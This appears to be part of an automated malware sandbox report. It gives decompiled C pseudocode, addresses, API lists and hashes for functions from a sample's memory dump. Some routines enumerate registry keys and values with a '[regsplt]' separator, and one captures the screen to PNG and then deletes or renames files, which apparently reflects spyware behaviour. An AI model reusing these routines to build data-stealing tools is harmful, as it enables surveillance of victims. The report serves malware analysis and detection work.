                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041077E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E0041077E(void* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				char _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t110;
				void* _t141;
				int _t145;
				int _t147;
				void* _t148;
				void* _t149;

				_t112 = __ecx;
				E004505A0();
				_push(_t141);
				_t145 = 0;
				_t110 = __ecx;
				E00431810(_t141,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							E004032F1(E004043E5(_t110,  &_v108,  &_v668, _t152, E0040425F(_t110,  &_v56, "\n")));
							L00401ED0();
							_t112 =  &_v56;
							L00401ED0();
						}
						_t145 = _t145 + 1;
					} while (_t145 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t147 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E0043A6FF(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E004032F1(E004043E5(_t110,  &_v56,  &_v43956, _t156, E0040425F(_t110,  &_v132, "\n")));
								L00401ED0();
								L00401ED0();
								E00403416(E004075C4(_t110,  &_v132,  &_v96,  &_v95, _t156, E00402064(_t110,  &_v56, "\n")));
								L00401FA7();
								L00401FA7();
								_t93 = E00402064(_t110,  &_v156, "[regsplt]");
								E00403416(L00402EFD( &_v132, E0040208B(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
								L00401FA7();
								L00401FA7();
								_t112 =  &_v156;
								_t73 = L00401FA7();
							}
							_t147 = _t147 + 1;
						} while (_t147 < _v20);
					}
				}
				return _t73;
			}






































                              0x0041077e
                              0x00410786
                              0x0041078d
                              0x00410793
                              0x0041079d
                              0x0041079f
                              0x004107a4
                              0x004107a7
                              0x004107b1
                              0x004107b4
                              0x004107e5
                              0x004107eb
                              0x004107f0
                              0x004107f6
                              0x004107f9
                              0x00410814
                              0x0041081a
                              0x0041081c
                              0x00410841
                              0x00410849
                              0x0041084e
                              0x00410851
                              0x00410851
                              0x00410856
                              0x00410857
                              0x004107f6
                              0x0041085c
                              0x00410861
                              0x00410867
                              0x0041086b
                              0x00410871
                              0x00410873
                              0x0041087a
                              0x00410881
                              0x00410882
                              0x00410889
                              0x0041088a
                              0x0041088c
                              0x0041088f
                              0x004108b4
                              0x004108ba
                              0x004108bc
                              0x004108cb
                              0x004108d0
                              0x004108f6
                              0x004108fe
                              0x00410906
                              0x0041092b
                              0x00410933
                              0x0041093b
                              0x0041094b
                              0x00410974
                              0x0041097c
                              0x00410984
                              0x00410989
                              0x0041098f
                              0x0041098f
                              0x00410994
                              0x00410995
                              0x00410871
                              0x0041086b
                              0x004109a4

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Enum$InfoQueryValue
                              • String ID: [regsplt]
                              • API String ID: 3554306468-4262303796
                              • Opcode ID: 3f3a0cd878ec93b8675eb228901256b7c34dde97a7cea0d935366d3af322abb8
                              • Instruction ID: 22bbaa2dbcebefa3ea57dad675ad9f0084f54ab00d474abf25edfd55553df339
                              • Opcode Fuzzy Hash: 3f3a0cd878ec93b8675eb228901256b7c34dde97a7cea0d935366d3af322abb8
                              • Instruction Fuzzy Hash: CB511B71900219AADB10EA95CC85EEFB77DAF04304F50017AF505F2191EB786B49CBA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00445519, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                              Download Yara Rule
                              C-Code - Quality: 72%
                              			E00445519(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = L0043BBA2(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0044C479(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0043629A();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = L0043DFD9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0044C479(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E004458E8(_a12, __eflags, _t213);
													L0043EE85(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0044C479(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0043629A();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46a00c; // 0x5d382218
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = L0044ED70(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00431810(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0044E990(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00445501);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0042F61B(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							L0043EE85(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = L0044ED30( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E004458C3( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = L00439E14();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043626D();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                              0x0044551e
                              0x00445521
                              0x00445527
                              0x0044553f
                              0x00445542
                              0x00445546
                              0x00445548
                              0x0044554a
                              0x0044554c
                              0x0044554f
                              0x00445552
                              0x00445555
                              0x00445557
                              0x004455af
                              0x004455af
                              0x004455b5
                              0x004455b7
                              0x004455c2
                              0x004455c6
                              0x004455c8
                              0x004455cb
                              0x004455cf
                              0x004455cf
                              0x004455d1
                              0x004455d3
                              0x004455d5
                              0x004455d7
                              0x004455d7
                              0x004455d9
                              0x004455dc
                              0x004455df
                              0x004455df
                              0x004455e1
                              0x004455e2
                              0x004455e2
                              0x004455ed
                              0x004455ef
                              0x004455f2
                              0x004455f3
                              0x004455f6
                              0x004455f6
                              0x004455fa
                              0x004455fd
                              0x00445600
                              0x00445600
                              0x0044560e
                              0x00445610
                              0x00445613
                              0x00445615
                              0x0044561f
                              0x00445622
                              0x00445625
                              0x00445627
                              0x0044562a
                              0x0044562c
                              0x0044567c
                              0x0044567f
                              0x0044567f
                              0x00445681
                              0x00000000
                              0x0044562e
                              0x00445630
                              0x00445630
                              0x00445632
                              0x00445635
                              0x00445635
                              0x0044563a
                              0x0044563d
                              0x0044563d
                              0x0044563f
                              0x00445640
                              0x00445640
                              0x00445644
                              0x00445647
                              0x00445647
                              0x0044564a
                              0x0044564d
                              0x0044565a
                              0x0044565f
                              0x00445662
                              0x00445664
                              0x0044569e
                              0x0044569f
                              0x004456a0
                              0x004456a1
                              0x004456a2
                              0x004456a3
                              0x004456a8
                              0x004456ac
                              0x004456ae
                              0x004456af
                              0x004456b2
                              0x004456b2
                              0x004456b5
                              0x004456b5
                              0x004456b7
                              0x004456b8
                              0x004456b8
                              0x004456c1
                              0x004456c2
                              0x004456c5
                              0x004456c8
                              0x004456cb
                              0x004456cd
                              0x004456d4
                              0x004456d6
                              0x004456d9
                              0x004456e3
                              0x004456e6
                              0x004456e7
                              0x004456e9
                              0x004456fd
                              0x004456fd
                              0x00445700
                              0x0044570a
                              0x0044570f
                              0x00445712
                              0x00445714
                              0x00000000
                              0x00445716
                              0x0044571a
                              0x00445723
                              0x00445729
                              0x00000000
                              0x0044572c
                              0x004456eb
                              0x004456eb
                              0x004456f1
                              0x004456f6
                              0x004456f9
                              0x004456fb
                              0x00445732
                              0x00445734
                              0x00445735
                              0x00445736
                              0x00445737
                              0x00445738
                              0x00445739
                              0x0044573e
                              0x00445741
                              0x00445742
                              0x00445744
                              0x0044574a
                              0x00445751
                              0x00445754
                              0x00445757
                              0x00445758
                              0x0044575b
                              0x0044575c
                              0x0044575f
                              0x00445760
                              0x00445781
                              0x00445781
                              0x00445783
                              0x00000000
                              0x00000000
                              0x00445768
                              0x0044576a
                              0x0044576c
                              0x0044576e
                              0x00445770
                              0x00445772
                              0x00445774
                              0x0044577f
                              0x00000000
                              0x0044577f
                              0x00445774
                              0x00445770
                              0x00000000
                              0x0044576c
                              0x00445785
                              0x00445787
                              0x0044578a
                              0x004457a3
                              0x004457a3
                              0x004457a5
                              0x004457a8
                              0x004457b8
                              0x004457ba
                              0x004457ba
                              0x004457aa
                              0x004457aa
                              0x004457ad
                              0x00000000
                              0x004457af
                              0x004457af
                              0x004457b2
                              0x00000000
                              0x004457b4
                              0x004457b4
                              0x004457b4
                              0x004457b2
                              0x004457ad
                              0x004457c8
                              0x004457cc
                              0x004457da
                              0x004457df
                              0x004457f4
                              0x004457f6
                              0x004457fc
                              0x004457ff
                              0x00445831
                              0x00445831
                              0x00445836
                              0x0044583c
                              0x0044583c
                              0x00445843
                              0x0044585d
                              0x0044585d
                              0x0044585e
                              0x00445864
                              0x0044586a
                              0x0044586b
                              0x0044586c
                              0x00445871
                              0x00445874
                              0x00445876
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00445845
                              0x00445845
                              0x0044584b
                              0x0044584d
                              0x00000000
                              0x0044584f
                              0x0044584f
                              0x00445852
                              0x00000000
                              0x00445854
                              0x00445854
                              0x0044585b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044585b
                              0x00445852
                              0x0044584d
                              0x00000000
                              0x00445878
                              0x00445880
                              0x00445886
                              0x00445888
                              0x00445888
                              0x00445890
                              0x00445895
                              0x0044589d
                              0x004458a0
                              0x004458a2
                              0x004458b6
                              0x004458bb
                              0x00445801
                              0x00445801
                              0x00445802
                              0x00445803
                              0x00445804
                              0x00445805
                              0x0044580d
                              0x0044580d
                              0x0044580d
                              0x0044580f
                              0x00445812
                              0x00445815
                              0x00445815
                              0x0044578c
                              0x0044578f
                              0x00445791
                              0x00000000
                              0x00445793
                              0x00445793
                              0x00445796
                              0x00445797
                              0x00445798
                              0x00445799
                              0x0044579e
                              0x00445791
                              0x0044581d
                              0x00445822
                              0x0044582d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004456fb
                              0x004456cf
                              0x004456d1
                              0x0044572d
                              0x00445731
                              0x00445731
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00445666
                              0x00445669
                              0x0044566c
                              0x0044566f
                              0x00445672
                              0x00445675
                              0x00445678
                              0x00445678
                              0x00000000
                              0x00445635
                              0x00445617
                              0x00445617
                              0x00445683
                              0x00445685
                              0x00000000
                              0x0044568a
                              0x00445559
                              0x00445559
                              0x0044555c
                              0x00445565
                              0x00445568
                              0x0044556f
                              0x00445571
                              0x0044558a
                              0x0044558b
                              0x0044558c
                              0x0044558e
                              0x00445593
                              0x00445573
                              0x00445573
                              0x00445576
                              0x00445577
                              0x00445579
                              0x0044557b
                              0x0044557d
                              0x00445582
                              0x00445582
                              0x00445596
                              0x00445598
                              0x0044559a
                              0x00000000
                              0x00000000
                              0x004455a0
                              0x004455a3
                              0x004455a5
                              0x004455a7
                              0x00000000
                              0x004455a9
                              0x004455a9
                              0x004455ac
                              0x00000000
                              0x004455ac
                              0x00000000
                              0x004455a7
                              0x0044568b
                              0x0044568e
                              0x00445693
                              0x00000000
                              0x00445696
                              0x00445529
                              0x00445529
                              0x00445530
                              0x00445531
                              0x00445533
                              0x00445538
                              0x00445697
                              0x0044569b
                              0x0044569b
                              0x00000000

                              APIs
                              • _strpbrk.LIBCMT ref: 00445568
                              • _free.LIBCMT ref: 00445685
                                • Part of subcall function 0043629A: IsProcessorFeaturePresent.KERNEL32(00000017,0043626C,0042F919,?,?,?,0042F919,00000016,?,?,00436279,00000000,00000000,00000000,00000000,00000000), ref: 0043629C
                                • Part of subcall function 0043629A: GetCurrentProcess.KERNEL32(C0000417,?,0042F919), ref: 004362BE
                                • Part of subcall function 0043629A: TerminateProcess.KERNEL32(00000000,?,0042F919), ref: 004362C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                              • String ID: *?$.
                              • API String ID: 2812119850-3972193922
                              • Opcode ID: 7a7b7176c1580aae0b71ae669cf6646ff09206bf0b49bd2b9ed38802292f1359
                              • Instruction ID: 9a964df7e2ccefeecbf26bda24bf2b163005b59dfbd6a4608a1e3f741a932d91
                              • Opcode Fuzzy Hash: 7a7b7176c1580aae0b71ae669cf6646ff09206bf0b49bd2b9ed38802292f1359
                              • Instruction Fuzzy Hash: AF51E371E0060AAFEF10CFA9C881ABEB7B5EF58314F25416EE454E7301EA799E018B54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041510D, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E0041510D(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;

				_t133 = __eflags;
				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E00403086(__edx,  &_v1184, E0040425F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
				L00401ED0();
				E004142A5( &_v1120, __edx, __eflags, 0);
				_t84 =  &_v1120;
				_t39 =  *0x46bd10(L00401F75(_t84), E00402469(), _t120, _t123, _t73);
				_t124 = _t39;
				L00413DBA( &_v1144, _t124);
				_t86 = L"image/png";
				E00414611(_t86,  &_v1112);
				L00413E32(L00401ECB( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(L00401F75(L00401E29(0x46c578,  &_v1112, _t133, 0x1b)))) == 1) {
					E004020B5(__edx,  &_v1224);
					_t54 = E00417334(L00401ECB( &_v1200),  &_v1224);
					_t135 = _t54;
					if(_t54 != 0) {
						DeleteFileW(L00401ECB( &_v1200));
						_t57 = E00402469();
						L00405A2F( &_v1048, L00401F75(0x46c560), _t57);
						_t60 = E00402469();
						L00405B57(_t74,  &_v1056,  &_v1224,  &_v1184, L00401F75( &_v1232), _t60);
						E00403086(_t74,  &_v1120, E0040425F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
						L00401ED0();
						_t67 = L00401ECB( &_v1120);
						E004020CC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
						E004173A6(_t67);
						L00401ED0();
						L00401FA7();
					}
					_t48 = L00401FA7();
				}
				L00413DE0(_t48,  &_v1152);
				L00401FA7();
				return L00401ED0();
			}





































                              0x0041510d
                              0x00415113
                              0x0041511c
                              0x0041511e
                              0x00415135
                              0x0041513f
                              0x0041514c
                              0x0041515c
                              0x00415166
                              0x0041516d
                              0x00415174
                              0x00415180
                              0x00415185
                              0x004151a1
                              0x004151a9
                              0x004151c2
                              0x004151cc
                              0x004151e0
                              0x004151e5
                              0x004151e7
                              0x004151f7
                              0x00415204
                              0x00415219
                              0x00415222
                              0x0041523e
                              0x0041525e
                              0x0041526b
                              0x00415277
                              0x00415288
                              0x0041528f
                              0x0041529e
                              0x004152a7
                              0x004152a7
                              0x004152b0
                              0x004152b0
                              0x004152b9
                              0x004152c2
                              0x004152d6

                              APIs
                                • Part of subcall function 004142A5: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                                • Part of subcall function 004142A5: CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                                • Part of subcall function 00413DBA: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00413DD0
                                • Part of subcall function 00413E32: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00413E43
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CreateFile$GdipImage$CompatibleDeleteFromLoadSaveStream
                              • String ID: dat$image/png$png
                              • API String ID: 4253173196-186023265
                              • Opcode ID: c354fd6ba5973f6dbb1216fc545b0f3e7c3095f3ba04cbf11662a49e537db3b6
                              • Instruction ID: ec78f574bbb469ede11c5765e841e4de501cabfd3cecff2c18e23e093a1ab6d9
                              • Opcode Fuzzy Hash: c354fd6ba5973f6dbb1216fc545b0f3e7c3095f3ba04cbf11662a49e537db3b6
                              • Instruction Fuzzy Hash: 9B4164721043405AC314FB62DC56DEFB7A9AF91348F40093FF586671E2EF385A49CA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043B909, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E0043B909(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					L00445E89(_t52);
					GetModuleFileNameA(0, 0x46b3c8, 0x104);
					_t49 =  *0x46ba3c; // 0x31734b8
					 *0x46ba44 = 0x46b3c8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x46b3c8;
					}
					_v8 = 0;
					_v16 = 0;
					L0043BA2D(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = L0043BBA2(_v8, _v16, 1);
					if(_t64 != 0) {
						L0043BA2D(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E004459A4(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x46ba30 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x46ba34 = _t59;
									L16:
									L0043EE85(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x46ba30 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x46ba34 = _t43;
						goto L10;
					} else {
						_t44 = L00439E14();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						L0043EE85(_t64);
						return _t50;
					}
				} else {
					_t45 = L00439E14();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0043626D();
					return _t65;
				}
			}





















                              0x0043b909
                              0x0043b916
                              0x0043b936
                              0x0043b949
                              0x0043b94f
                              0x0043b955
                              0x0043b95d
                              0x0043b964
                              0x0043b964
